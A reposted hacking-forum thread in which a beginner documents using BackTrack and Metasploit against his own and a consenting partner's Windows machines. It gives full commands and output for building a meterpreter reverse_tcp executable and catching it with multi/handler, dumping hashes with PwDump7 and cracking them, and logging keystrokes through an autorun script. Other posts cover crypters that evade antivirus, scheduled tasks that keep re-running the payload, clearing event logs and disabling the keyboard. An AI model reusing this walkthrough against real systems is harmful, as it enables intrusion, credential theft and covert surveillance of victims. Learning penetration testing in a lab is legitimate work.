One persons journey with Back Track

[Archangel-Amael]

In the effort of preserving material that would be useful to others in the Back Track community I am porting over this thread the shows one persons journey of using Back Track and it's tools. I also want to help set the stage for the types of material/information and threads that we would like to see in this section. As such this thread while posted by me is the work of another member. I have taken all occasions to contact the OP to give credit for their work. Also I believe there is a lot of good things that one can learn from this thread. Portions of the thread that do not affect the readability of the content may have been edited.
QUOTE=AnActivist;
There are much more advanced ways to perform these tasks but being new I decided to try to simply the process as much as possible. There are also a lot of tutorials on this but I don't think adding one more will hurt. Finally, this is really to help me learn, so if you see any errors please let me know so I can fix them.

Goal: Use Metasploit to get into victims computer, get hashes, and crack them.
Victim Specs: Windows XP SP2, no anti virus
Attacker Specs: Ubuntu 8.10, Metasploit v3.2, John the Ripper
Links/Tuts/Authors to be credited:
John Strand Metasploit Meterpreter Reverse exe,
pureh@te XP Passwords

I had trouble finding an exploit for actually getting into to windows box because it is SP2 so instead I made my payload into an .exe file that would be executed by the victim.

The payload that I used was the windows/meterpreter/reverse_tcp. This payload injects the meterpreter server DLL into the victim and then connects back to the attack via the attacker's IP and Port. To turn this into an executable you can use the following command:

Code:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.xxx LPORT=4444 X > MSPAYLOAD.exe

If all goes well you should see something like this:

Code:

Created by msfpayload ().

Payload: windows/meterpreter/reverse_tcp

 Length: 278

Options: LHOST=192.168.1.xxx,LPORT=4444

A couple important notes:
1.Make sure that you have navigated to the Metasploit Framework directory before issuing the above command, or instead of just issuing ./msfpayload you issue something like /home/username/framework-3.2/msfpayload
2.You can check your local ip by using the

Code:

ifconfig

command. Be aware that the whole point of this is that the victim will be connecting to YOU so you have to use YOUR ip.
3.Take a note of the LPORT this is again the port the victim will be connecting to; you need to remember this so you can listen on it later.
4.Don't forget the

Code:

 X

towards the end of the command, without it the payload won't be turned into an executable.

Alright so now we have our executable. This executable needs to be executed by the victim that we want to connect to to ourselves. You can use a lot of different creative ways to achieve this. A couple could be sending it via email, use netcat or ssh. To simply the process I just used a usb flash drive. All I did was copy MSPAYLOAD.exe to the flash drive and then from there copied it to the victims computer. One important note is that when I tried this on a computer with Avast AV it freaked out; my victim box doesn't have an AV (anti virus) yet so it wasn't a problem but if it is for you just disable the AV or try to figure out how to get past it (this is possible). Note: don't execute the executable yet.

So now we have created our executable and its on the victim's box. The next step is to start listening on the LPORT that we specified in our executable for the meterpreter that will be sent. We can do this using the exploit/multi/handler module. This module will allow us to wait for for our payload/exploit/executable to be launched outside the framework. To do this first start up the msfconsole, you can do this with

Code:

 ./msfconsole

. Once the console has been started up issue the following command:

Code:

use exploit/multi/handler

If you were successful you should see the

Code:

msf >

prompt change to

Code:

 msf exploit(handler) >

Now we need to set up our payload to listen for the meterpreter that will be sent from the victim's box once they execute the MSPAYLOAD.EXE. Issue the following command:

Code:

 set PAYLOAD windows/meterpreter/reverse_tcp

then set you LHOST and LPORT

Code:

msf exploit(handler) > set LHOST 192.168.1.xxx

LHOST => 192.168.1.100

msf exploit(handler) > set LPORT 4444

LPORT => 4444

Once again make sure you note that this is your ip and that the port you are listening on must match the port that MSPAYLOAD.EXE will be sending the meterpreter to. Once you have checked that everything is in order issue the command

Code:

exploit

. If all goes well it should look like this:

Code:

 msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler

Now we are ready to execute MSPAYLOAD.EXE on the victims box. Execute MSPAYLOAD.EXE or whatever your .exe file is named on the victim's box now. If you have done everything correctly so far then not much should happen on the victims box but on yours something magical has happened. Your msfconsole should now look like this:

Code:

msf exploit(handler) > exploit


[*] Starting the payload handler...
[*] Started reverse handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.xxx:4444 -> 192.168.1.103:1030)

meterpreter >

Note: If you meterpreter session doesn't open right away you can check for active sessions by typing “sessions -l” and then using the particular ID of the active session type “sessions -i (ID number)”

Now you are in. You can check the processes that are running on the victim's computer by issuing the

Code:

 ps

command and you should see MSPAYLOAD.EXE or whatever you named you executable nestled in there.

Now we need to upload some files onto our victims computer. The two files that we will be upload are PwDump7.exe and libeay32.dll. We can do this by issuing the following commands:

Code:

upload /home/username/PwDump7/PwDump7.exe C:\\PwDump7.exe

upload /home/username/PwDump7/libeay32.dll C:\\libeay32.dll

If you are successful your msfconsole should look like this:

Code:

meterpreter > upload /home/max/PwDump7/PwDump7.exe C:\\PwDump7.exe
[*] uploading  : /home/max/PwDump7/PwDump7.exe -> C:\PwDump7.exe
[*] uploaded   : /home/max/PwDump7/PwDump7.exe -> C:\PwDump7.exe

meterpreter > upload /home/max/PwDump7/libeay32.dll C:\\libeay32.dll
[*] uploading  : /home/max/PwDump7/libeay32.dll -> C:\libeay32.dll
[*] uploaded   : /home/max/PwDump7/libeay32.dll -> C:\libeay32.dll

Some important notes:
1.The directory that PwDump7.exe and libeay32.dll is located on my be different for you
2.You can download PwDump7 from

Now that we have our important files uploaded onto the victims computer we need to run PwDump7 but first we need to get a command prompt. To do this issue the following command:

Code:

  execute -f cmd.exe -c -H -i

If you are successful your msfconsole should have warped and now looks something like this:

Code:

meterpreter > execute -f cmd.exe -c -H -i

Process 1644 created.

Channel 3 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Now we want to execute PwDump7 and we want it to dump the hash into a text file that I will name XPHASH.txt. You can do this by issuing the following command:

Code:

PwDump7 > XPHASH.txt

If you are successful your command prompt should look like this:

Code:

C:\>PwDump7 > XPHASH.txt

PwDump7 > XPHASH.txt

Pwdump v7.1 - raw password extractor

Author: Andres Tarasco Acuna

C:\>

You can now exit the command prompt and get back into the meterpreter (this will happen automatically if you simply type “exit”). Once inside the meterpreter we want to download the newly created hash XPHASH.txt onto our computer so we can crack it with John the Ripper. You can download XPHASH.txt to your computer by issuing the following command:

Code:

download C:\\XPHASH.txt /home/username/Desktop/XPHASH.txt

If you are successful your msfconsole should look like this:

Code:

meterpreter > download C:\\XPHASH.txt /home/max/Desktop/XPHASH.txt
[*] downloading: C:\XPHASH.txt -> /home/username/Desktop/XPHASH.txt
[*] downloaded : C:\XPHASH.txt -> /home/username/Desktop/XPHASH.txt

Now you can exit disconnect from the victim's box because we have everything we need. The final step is to use John the Ripper to crack XPHASH.txt.

To crack XPHASH.txt you can issue the following command:

Code:

 john -f:NT –wordlist=/home/username/Desktop/wordlist.txt /home/username/Desktop/XPHASH.txt

Note:
1.wordlist.txt can be downloaded for John the Ripper, just Google for JtR wordlists downloads
2.Your directories may be different than mine
3.If you want to do this only for testing purposes then you could just make a wordlist with the actual passwords of the box just to see if it works (this is what I did).

Thats it for me. I hope this helps some people. Like I said before please point out errors so that I can fix them. I'm going to explore the password cracking process more and try to do this again, I'm also going to try to get past my AV, and explore new ways to get the .exe file onto the victims computer.

last note: I wasn't able to post any urls because I don't have enough posts, just Google if you want websites.

[Archangel-Amael]

QUOTE=AnActivist Alright well I didn't quite make the full leap to using BT3 as my main OS but I did finally get the dual boot working. The whole experience was pretty intense and really showed me how I'm still clinging a little bit too tightly to MS and their pretty yet tacky GUIs. Just a tip for anyone reading, I think that it is easier to just erase the entire HDD then install BT and then install/partition with Ubuntu, no need to go completely into as many others have.

The real interesting news is BigMac's video. I've used his method successfully (via his really well put together video) on my test box that is running XP SP2. I'm still going to work on double encoding and then try to see if I can get a keylogger working.

Introduction:

After following BigMac's tutorial I can get a meterpreter session on my test box (XP SP2) every time the computer restarts. I heard about the key logger functionality that the meterpreter has so did some reading about it. I read the following: **I can't post urls but its on the Metasploit blog** (just scroll down until you see the blog about keysniffing). I wanted to try to test it out so I started up the msfconsole and started waiting on my forwarded port and then booted up my test box...

Testing:

Code:

msf exploit(handler) > jobs

Jobs
====

  Id  Name
  --  ----
  0   Exploit: multi/handler

msf exploit(handler) >
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Killing Antivirus services on the target...
[*] Meterpreter session 1 opened (xxx.xxx.x.xxx:xxx -> xxx.xxx.xxx.xxx:xxx)

sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  xxx.xxx.x.xxx:xxx -> xxx.xxx.xxx.xxx:xxx

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

If you go to the darkoperator blog that is linked in the above page there is this quote: To me this means that the meterpreter session that I had just started would be sufficient enough to use the key logger. I typed in "help" to see if the commands were accessible...

Code:

Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump they keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    setdesktop     Move to a different workstation and desktop
    uictl          Control some of the user interface components

meterpreter >

I was pretty disappointed to see that I didn't have the "grabdesktop" command that according to both blogs was needed for keyboard sniffing...

I decided to try to move on and try to go on without it and migrate the Explorer.exe...
note: 2004 is the pid of Explorer.exe

Code:

meterpreter > migrate 2004[*] Migrating to 2004...
[*] Migration completed successfully.
meterpreter >

I then tried to start the keyscan with "keyscan_start". After that I opened up notepad on the test box and proceeded to pretend to log into a gmail account. (Note: The account and password are both fictional, also both the fictional password and email account were typed into notepad to simulate logging into gmail, this was done to prevent any infringement) After that I tried to dump the keys with "keyscan_dump"...

Code:

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
xxxgmail.xxx <Return> victimxgmail.xxx <Tab> t1sp4ssw0rdw0uldbeh4rdt0cr4ck <Return>
meterpreter >

Success! You can see that the victim's gmail account was victim@gmail. com and the password was t1sp4ssw0rdw0uldbeh4rdt0cr4ck.

Note: After exiting the meterpreter sesssion the test box get a Windows Explorer error and had to restart. I tried to get around this by migrating to a different process but this just causes a different error.

But now lets try it without migrating. This time I did the exact same thing as before: listen on forwarded port, start meterpreter sessions execpt now I did not migrate to Explorer.exe....

Code:

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
xxx.gmail.xxx <Return> victim2@gmail.xxx <Tab> thisisthesecondpassword <Return>
meterpreter >

Hmmm success again? This time gmail account is victim2@gmail. com password is thisisthesecondpassword.
Note: There was no exiting error.

Concluding Questions:

After this test I'm left with 3 questions:
1. Where is my missing Stdapi: User interface Commands?
2. How do I get around the error that comes up on the victim's computer when I exit the meterpreter session after migrating to Explorer.exe?
3. Why does this still the keylogger obviously work (in this case) even though there are two missing parts: First using "grabdesktop" and second migrating to Explorer.exe?

Hypothesis':

1. Has something to do with the victim box being on my LAN.
2. Has something to do with the victim's account having administrative access.
3. The Metasploit team updated something.

Looking forward to some feedback . Please feel free to test my method and show results

[Archangel-Amael]

QUOTE=AnActivist Follow up for using the key sniffing functionality with the meterpreter in Metasploit:

My girlfriend who uses runs Windows Vista agreed to run a pentest with me. While I was at it I also tested out BigMac's method of making payload executables that are undetectable by AVs (she uses Macafee) and it was completely undetectable!

Testing specs:
Victim: Windows Vista with Macafee AV
Attacker: BT3 Final
Both computers have different IPs and are not on the same LAN

Testing:
After getting a active meterpreter session with the victim I proceeded to start sniffing for keystrokes with the "keyscan_start" command. Its important to note that I did not migrate processes or use the "grabdesktop" command. We then proceeded to do the same test as bellow except on her computer. She opened a text file typed "w ww.gmail.c om" followed by a fictional email account and a fictional password. I then dumped the key strokes with the "keyscan_dump" command and could see exactly what she had typed in plain text.

Concluding Questions:

Because everything when normally I am still left with the same three questions:
1. Where is my missing Stdapi: User interface Commands?
2. How do I get around the error that comes up on the victim's computer when I exit the meterpreter session after migrating to Explorer.exe?
3. Why does this still the keylogger obviously work (in this case) even though there are two missing parts: First using "grabdesktop" and second migrating to Explorer.exe?

Hypothesis:

What is exciting about this test is that I was able to eliminate two of my three hypothesis; first it has nothing to do with the LAN (for obvious reasons), two it doesn't have to do with Administrative access (her account did not have administrative privileges), and a third that I hadn't asked: it doesn't have to do with XP because she is running Vista.

This leaves me with one last hypothesis:
3. The Metasploit team updated something.
Although its strange because I haven't read anything about it in their blog.

Anyways I think it was a very valuable test, I'll be searching for more information and will be updating. I'm not sure if this is interesting enough for a tutorial especially since its so simple but I wouldn't mind helping out (as so many other people are posting videos and I haven't seen one about this) and making a video about it if people are interested.

If anyone tries this and they see another reason why its working for me and not for them, or have any other answers to the above questions; I'd really like to know.

Cheers

Automatically start sniffing keys:

There is a script that is in the trunk/scripts/meterpreter directory called keylogrecorder.rb; the point of this script is to dump the key strokes into a database. I'm trying to fully understand how this works but from reading over the source code I was able to make my own script (probably the smallest one of all time) that will automatically execute the "keyscan_start" command. I then set the script to be run automatically also:

Code:

set AutoRunScript /root/Desktop/exploits/SCRIPTS/sniffKEYS.rb

This makes it possible to automatically start sniffing for key strokes as soon as the victim executes the payload that has been turned into an executable, in this case meta.exe.

I'm still trying to learn about making more useful scripts. Especially trying to do things like move or delete files on the "victim's" box.

This is what my sniffKEYS.rb script looks like its not much but it gets the job done.

Code:

print_status("Starting the keystroke sniffer...")
 session.ui.keyscan_start

Concluding Questions:

1. Where is there more information about how to write scripts that automate meterpreter events?
2. Where is there more informations about how to write scripts that automate windows events?

I should have a follow-up post soon after doing some more research but if anyone already has the answers it would be much appreciated.

[Archangel-Amael]

QUOTE=KMDave First of all great that someone is learning on his own and sharing his results and thoughts.

Something to think about: You mentioned that the keylogger gets executed everytime the executable containing the payload is executed. But that would require it to be executed either manually by the victim or automatically. That is kind of noisy on a system. You could/should think of other ways too

QUOTE=pureh@te Something else to think about that I have since learned is that using meterpreters password hash function is much safer thean pwdump because it was designed not to "Touch the disc" like pwdump does.
http://www.metasploit.com/data/antif...c_Analysis.pdf
See slide 29

QUOTE=AnActivist Thanks for the words of encouragement KMDave, and thank you for the tip hate I saw a video about using the meterpreter's passwd dump but I haven't gotten around to it yet I'm definitely going to try it out soon.

Following up to what was posted bellow:

Using the meterpreter to dump hashes is much better than the more conventional methods because it doesn't doesn't touch the registry or the disk. Finding this out actually disappointed me a little bit because I've been trying to figure out how to write scripts that DO modify the "victim's" registry; now I find out that that actually isn't very sneaky at all, more on that farther down.

From reading about what exactly creating noise on a system is I've come to the following conclusion: Noise on system = excess traffic = easier to be detected. After thinking about it and doing some research its hard for me to think of another way to start the keylogger without creating any noise because if I start the keyscan manually via keyscan_start or automatically via a script it still starts the keyscan. However, I did find some other interesting material on perhaps eliminating the noise that is created: There is an interesting pdf that I found titled ChiCon07_Gates_ Metasploit-Day-2-FunStuff (google the title and you should be able to find it) on page 26 it talks about clearing the event log. KMDave, I'm not sure if this is what you were talking about but I'm sure it is a step in the right direction.

Follow up to Automatically Start sniffing keys Concluding Questions:

After reading a bit of the above mentioned pdf it provided a link to a section of the metasploit website that had provided the answers to both questions (I think). The reason I say I think is because I don't fully understand how exactly I can use it to reference what I am trying to look up. I have some experience with C++ so I am no stranger to classes and objects and OOP but the lay out of the documentation is confusing to me. I'm pretty sure that the site does address the questions I had and will help teach me how to automate not only events in a meterpreter session but also on a "victim's" Windows Box. Here is the link: Rex Documentation

Concluding Questions/Goals:
1. Explore more about hiding/deleting presence on a victims computer.
2. Learn how to use the above link as a tool to write scripts: An example:
How can I use the Rex Documentation (above link) to teach myself what exactly the following line of code does:

Code:

 session.ui.keyscan_start

? Note: I already understand what that particular function is but I'm not sure exactly how this is happening, I think that the Rex Documentation will provide the answers but I'm not sure how to search for them.
3. Use scripting to automate all of the following:
-Interact with sessions
-Kill processes
-Delete/Move files
-Modify registry (in particular I want to try to modify the registry so that it will execute a payload at scheduled intervals Note: I've already read up a bit on the Windows Task Scheduler but I'm still trying to find out what Reg Keys it modifies so I can automate the process)
-Sweep LAN and install other files/payloads on computers on the "victim's" LAN: this one interests me a lot but I think its more down the road.

I really appreciate the advice so far thank you.

[Archangel-Amael]

QUOTE=compaq A tool i found on another site, it makes it harder for exe to be detected.
Author, is the person at the top of program.

RapidShare: 1-CLICK Web hosting - Easy Filehosting

QUOTE=AnActivist Is this the site that you got it from? I'm just wondering because I think that the rapid share download is just an executable without a help file or anything. Building Your Own Executable Crypter In any case I'm going to read about it on the site and will try it out.

QUOTE=compaq Windows GUI,Create the metasploit payload exe, then run the above program and select the metasploit file, it will edit the binary code, to stop signature based AV.
No, can't remember were I found it.

[Archangel-Amael]

QUOTE=AnActivist I've been doing some research and found exactly what I am looking for. Thanks to darkoperator's blog Shell Is Only The Beginning, specifically "Abusing the scheduler with the meterpreter" I've been able to *almost* kill multiple birds with one stone with his script scheduleme.rb Link: Security and Networking - Blog

I say almost because although I feel like I've made progress by finding this information, implementing it has proven harder than I thought. I've tried just about every combination of commands to try and get to my goal.

Goal:

Get a windows/meterpreter/reverse_tcp converted to an executable that has already been installed on the "victim's" computer to execute remotely every 15 minutes -1 hour. The reason I am trying to do this is because if the meterpreter session is lost its nice to know that I only have to wait another *insert chosen time here* minutes for the executable to run again and thus send me a meterpreter session.This method I believe goes along the lines of what both hate and KMDave were talking about because it stays "either under the privileges under which Meterpreter is running or a username and password provided each report per host saved in a different file and location for later analysis. (darkoperator)"

Problem:

I just can't seem to get the syntax correct; it is also difficult to find information on how to use darkoperator's script because it seems that he is one of the few people who knows about it (or at least writes about it) except for a site called Laramies Corner which just brushes over it in a couple lines.

Attempts:

These are several of my documented attempts at getting the script to run properly. Note: I am trying to get an executable that has already been installed on the "victim's" computer to run on a schedule that is specified by me.

Code:

meterpreter > run scheduleme -m 1 -c "C:\system\windows\vn.exe"[*] Scheduling command C:systemwindowsvn.exe to run minute.....[*] Failed to create scheduled task!!
meterpreter >

Code:

meterpreter > run scheduleme -m 1 -c C:\system\windows\vn.exe[*] Scheduling command C:systemwindowsvn.exe to run minute.....[*] Failed to create scheduled task!!

Code:

meterpreter > run scheduleme -m 1 -r -c C:\system\windows\vn.exe[*] Scheduling command C:systemwindowsvn.exe to run minute.....[*] Failed to create scheduled task!!

Code:

meterpreter > run scheduleme -m 1 -r -t C:\system\windows\vn.exe
This is just read as completley wrong and goes to the help file...

The list goes on but none have achieved the desired goal.

Hypothesis:

1. Probably the most likely is that my syntax is just plain wrong I have a couple theories about where it could be wrong:
- The -c is for a "command" but I'm just putting in a "file" however I don't really know what the proper "command" is to execute the right "file"
- I'm mixing up what exactly darkoperator means by "remote"
I'm hoping this is the problem which would lead to a quick fix with the correct advice/information/hint. I'm already sure that the script is compatible with XP because it clearly states it at the top of the script so I'm sure that the problem is purely on the end of the user (me).

I'd really appreciate a nudge in the right direction from the community on this one. As always thanks for taking the time to read.

[Archangel-Amael]

QUOTE=AnActivist Over the last couple days I've put aside my previous goals to work on figuring out which pentesting lab setup I like the best. I didn't think this would take that long but the adventure has been much harder than I anticipated, which is not to say I didn't learn a lot.

Goal: Try out all of the well known methods for using backtrack including: vmware, hard drive install, live cd, *soon to have usb but I want a bigger flash drive first*

Live CD: This one is pretty obvious.

VMware:
Specs: Installing VMware-Workstation in Ubuntu 9.04.

After a little bit of googling i found a video by kivi12k it very clearly discribes how to set everything up and run it. If you do follow this tut you can priv message him or me to help you register you VMware-Workstation.

Link: Install and setup Backtrack 4 Beta on VmWare Workstation

Problems encountered: I'm not sure what exactly is it with that particular video but it really does not like Ubuntu. You have to install some codecs but they don't really work. I suggest you watch it from a windows partition if you have one. If not try and install the packages but you won't be able to fast-forward or rewind which was pretty frustrating.

I like the Vmware setup because it was very easy to get working, and I got to use Backtrack4 beta. Also its nice to not have to worry about having to reboot every time I want to use Backtrack

The initial reason why I didn't like VMware was because the up and down arrow keys don't work and instead invoke certain shortcuts, I'm sure there is a way around this but then my Vmware-worstation froze and then crashed which I really didn't like. Also I'm not sure if this is because of Vmware or because of BT4 Beta but I can't seem to get the framework to update properly with "svn update"; its because of this I think that some of the functionality or the meterpreter is missing: mainly the ones used to sniff for keystrokes.

Dual-Boot/HDD install:

This is probably the method that is hated most by both Veterans and Newbies. Veterans probably hate it more than Newbies for the very reason that when Newbies hate something they post it all over the Internet/this forum. This setup method took me about the last 3 days to get working properly. I also decided to go back to Backtrack 3 for my dual boot just because I liked it more.

I like the hard install because it does not freeze or lag out, it is easy to save files/configuration changes, and because it was such an awesome adventure to get it working I feel as if I'm almost obligated to use it.

I don't like it because I have to reboot but I don't think it is that big of a deal.

Conclusion: I'm going to be using Backtrack3 final on my /dev/sda2 partition to do my pentesting, but will explore vmware (which is still on my /dev/sda1 Ubuntu partition) in the future.

I hope that my little how-to will help some people I will copy and paste it into the How-To section of the forum if people think it would be useful but I'm keeping it here for now just in case there are some problems with it. That being said please let me know if there is a problem with the how-to so I can fix it or let me know if you (someone with more experience) thinks that its worth putting in the how-to section.

I'm really happy that I can finally get back to working on some of the other projects that I have started, thanks for reading.

[Archangel-Amael]

QUOTE=AnActivist Questions:
-Why, while in a meterpreter session on a victim's computer can i sniff keystrokes without going through the other steps laid out in other blogs (specifically migrating processes and issuing the "grabdesktop" command)? Everything works fine for me if I simply issue the command keyscan_start.

-Where can I find information about how to use the API documentation provided by the Metasploit team on their website to write my own scripts?

Some Updates:
-Darkoperator was helping me out with his scheduleme script; after a little bit of testing he discovered that the reason why the scrip was not working was because I am testing on a windows XP Home Edition SP2. The home ed is the most important part because it is missing schtasks.exe which allows tasks to be scheduled from the command line. Luckily there is another laptop in my house that runs the Professional Edition (which does have schtasks.exe) so I will be testing it on that soon. Thanks very much to Darkoperator; he put in a lot of time writing e-mails to explain to me what was happening.

-I am still able to sniff keys via only using the keyscan_start command (in a meterpreter session) and when I last addressed this I was left with the conclusion that the metasploit team had updated something. I still haven't really been able to a credible answer on either the Metasploit website or the closely related blogs. However I added another hypothesis: Perhaps windows XP home doesn't have an added layer of security that would normally have to subverted if it were XP Professional. I'm not sure if this would explain why commands like "grabdesktop" are missing from the meterpreter sessions though; maybe someone can clarify this for me?

-I've been doing a lot of reading about the scripting functionality with Metasploit and it confirms that all the goals laid out in a previous post I made can be automated using Ruby scripting. The problem I am having, is that I can't really find any info for how to write the scripts. I have some experience with programming but I'm just not sure how to use the API documentation on the Metasploit website to learn how to use the scripts/functionality that is available.

-Finally I'm very interested in using the keylogrecorder.rb script (also written by DO). I should have a bit of a report on that soon.

I realize that some of these posts are long winded so I decided to put my questions at the beginning just in case a more experienced reader in reading and already has the answers. Thanks for reading.

Edit: If anyone has time check out the How-To and see if its accurate/makes sense. It would be my first one so I didn't want to just throw it out there without it being reviewed first.

[Archangel-Amael]

QUOTE=AnActivist131063 Thank you for the compliment and the tip; I went out and got the book and am reading it now .

After being recommended to read Metasploit Toolkit I decided to go out and get it. So far I'm only a chapter in and already I've learned so much. Especially since this is chapter 1, I still have a ton of questions. I decided to keep some notes as I read and record any questions/observations/things I want to explore/things I think are interesting. I'm going to try and get through one chapter per a day and will be posting more questions or answers as I go on, hopefully I should be able to answer a lot of my own questions through the readings. At the end of the read I'm going to go through and find any of my own questions I didn't answer and try to answer them either through reading more carefully or finding other sources. All my observations are rephrased and in my own words; hopefully I won't change the meaning and get something wrong; if I do please point it out. So far this book has not only answered many questions (especially ones from previous posts) that I've already had but opened my mind to many more possibilities.
One last thing questions or curriousities have '-'s and observations have '+'s next to them.

4/28/09 Chapter 1:
-Research Transmogrify to mask/unmask files as any file type.
-Find out how to start a meterpreter session and then disconnect from it but still have it remain active.
-Learn about disablement of keyboard/mouse input.
-What is network pivoting?
-How to interface Metasploit with Nmap or Nessus?
-Learn more about ilog, which is a method of Information logging.
-What is Serve Message Block (SMB)?
-Explore the potential of the Metasploit Data bases.
-Can you execute a payload on a victim's pc which sends a meterpreter shell back to the attacker; who has used the msfd utility to listen on a specified port; then connect from another remote computer to the attackers computer and work with the meterpreter shell that has been sent to the original attacker?

+In ruby there are modules. Modules are different from C++ classes because there can actually include classes along with other methods or constants. Modules are basically like a big container of related frameworks tools and variables.

+The Rex library is basically a big bucket of classes and modules that can be used to enhance/interact with the MSF

+The confusion I was having about reading about reading the Rex API documentation was because everything is grouped in namespaces, within those namespaces there are other classes or modules. For example the class Rex::Exploitation::Egghunter is inside the namespace Rex::Exploitation.

+SEH = Structured Exception Handler.

After reading about the capabilities of msfd I was pretty excited to try it out. Just so people reading don't have to read the whole thing if they don't want to I was not successful this first try; I was able to send the metasploit console but it did not have the the meterpreter session running in the background as I had wanted. Initially I'm not sure why this is. A more detailed description is below. For anyone interested in using the msfd and are beginners this could be a little mini how-to also.

Goal: Get Victim to execute payload which will allow a meterpreter shell to be interacted with remotely by an attacker; how exploit is put in the background and not opened right away; instead the attacker then uses msfd to listen on port 4444 and then netcat to connect remotely to the original attackers computer and proceed to interact with the still original victim.

Specs: Original attacker BT3 running inside VMware (it did pay off to use ), Original Victim Windows XP Home edition SP2, Remote Connector to Attacker Ubuntu 9.04

Step 1: Just the basics: Make an executable payload to be run by vicitim then using the msfconsole; start the exploit in the background, then execute payload on victims computer.

Code:

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.xxx
LHOST => 192.168.1.xxx
msf exploit(handler) > set LPORT xxx
LPORT => xxx
msf exploit(handler) > exploit -j[*] Exploit running as background job.

msf exploit(handler) >[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Starting the payload handler...


msf exploit(handler) >[*] Transmitting intermediate stager for over-sized stage...(191 bytes)[*] Sending stage (2650 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (75787 bytes)...[*] Upload completed.[*] Meterpreter session 2 opened (192.168.1.xxx:xxx -> xxxxxxxxxxxxx)

Step 2: The meterpreter session is obviously now in the background. Now for the test. Set up msfd to listen on port 4444 for any incoming traffic.

Code:

sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  2   Meterpreter  192.168.1.xxx:xxx -> xxxxxxxxxxxxxxxxx

msf exploit(handler) > msfd -a 192.168.1.xxx -d -p 4444

Step 3: Now everything should be setup. I now switch to my Connecting Attacker (Ubuntu Box) and fire up netcat and ask it to connect to my attacker on the specified port.

Code:

xxx@xxxx:~$ nc 192.168.1.XXX 4444

Step 4: Hit enter and voila, success (or so I thought), upon closer inspection I see that I did in fact get an interactive msfconsole but there are no active sessions.

Code:

xxx@xxxx:~$ nc 192.168.1.XXX 4444

#    # ###### #####   ##    ####  #####  #       ####  # ##### 
##  ## #        #    #  #  #      #    # #      #    # #   #   
# ## # #####    #   #    #  ####  #    # #      #    # #   #   
#    # #        #   ######      # #####  #      #    # #   #   
#    # #        #   #    # #    # #      #      #    # #   #   
#    # ######   #   #    #  ####  #      ######  ####  #   #   


       =[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 56 aux

msf exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

msf exploit(handler) >

Conclusion: Well the test was a failure but its only the first one. I'm still not completley sure if what I'm trying to do is even possible, maybe someone else can give me a hint? I will be doing more research on this as I read Metasploit Toolkit, and outside research.

Concluding Questions:
Is this possible? If so what did I do wrong?

Thank you for reading.

[Archangel-Amael]

QUOTE=KMDave Did you try to start the exploit on the victim again after running the msfd?

QUOTE=AnActivis Actually I'm not actually trying any "exploits" right now I'm more interested in the post exploitation. I haven't tried it yet but I'm sure it would work because the msfconsole that was sent is fully functional. What I was interested in when I did this test was to see if once a "victim" has been exploited if the attacker could interact with that "victim" not just remotely but remotely control the computer that is remotely controlling the

QUOTE=KMDave I know what you mean. What I was trying to say, give it a try to run msfd first and then run the exploit on the victims machine

QUOTE=AnActivist Oh I see what you are saying. I just tried it but for some reason I can't get msfd to run in daemon mode. I checked the help option and the -d option is no longer available. Then I did some googling and looked at the source for msfd and it looks like it should automatically go into the background as long the -f option is not specified. The problem is that this isn't happening so I'm faced with this

Code:

msf > msfd -a 192.168.1.xxx -p 4444
[*] exec: msfd -a 192.168.1.xxx-p 4444
[*] Initializing msfd...
[*] Running msfd...

It just stays like this and I am never returned to the msfconsole to set up a listener for the payload on the victims computer. Any hints for how to get around this?

QUOTE=AnActivist @laffing_man
The firewall is on. It doesn't really matter either way though because I'm using a payload that has been turned into an executable and then executing that executable on the victims computer (Win XP box). The victim could have to the best firewall in the world but it doesn't block (at least to my knowledge and correct me if I'm wrong) traffic going out, only traffic going in. Basically the victim is sending the meterpreter shell to the attacker who is listening and waiting for it. I'm pretty sure this renders any firewalls useless but I could be wrong.
Edit: I stand corrected read above.

QUOTE=AnActivist I'm about 3/4 the way through chapter 4. Chapters 2-3 were really all about configuration, chapter four is very interesting but didn't really leave me with any new questions just a couple new answers. Here is a fun little mini-mini how-to describing how to disable a victim's keyboard (note: I just looked this up on the metasploit website as it pops up in a lot of custom scripts that are available there) and how to put active meterpreter sessions in the background without disconnecting from them. I'm still trying to figure out msfd.

2/29/09 Notes

Progress:
-Find out how to start a meterpreter session and then disconnect from it but still have it remain active:

This can be achieved with CTRL+Z, which will put a meterpreter session in the background so one can interact with the msfconsole again without ending the meterpreter session.
Note: One thing that is strange is that when it asks you if you want to background your session using [y/N]? and you type "y"<enter> you will get an error message saying your command was invalid, however if you check your active sessions the meterpreter session was in fact put in the background and is still fully functional.

-Learn about disablement of keyboard/mouse input.
I really like this one, very fun possibilities. Its also very simple to do. Once in the meterpreter shell just use uictl followed by the specified parameters, you can use the -h option for help. In the following example I disable the victim's keyboard.

Code:

meterpreter > uictl -h
Usage: uictl [enable/disable] [keyboard/mouse]
meterpreter > uictl disable keyboard
Disabling keyboard...
meterpreter >

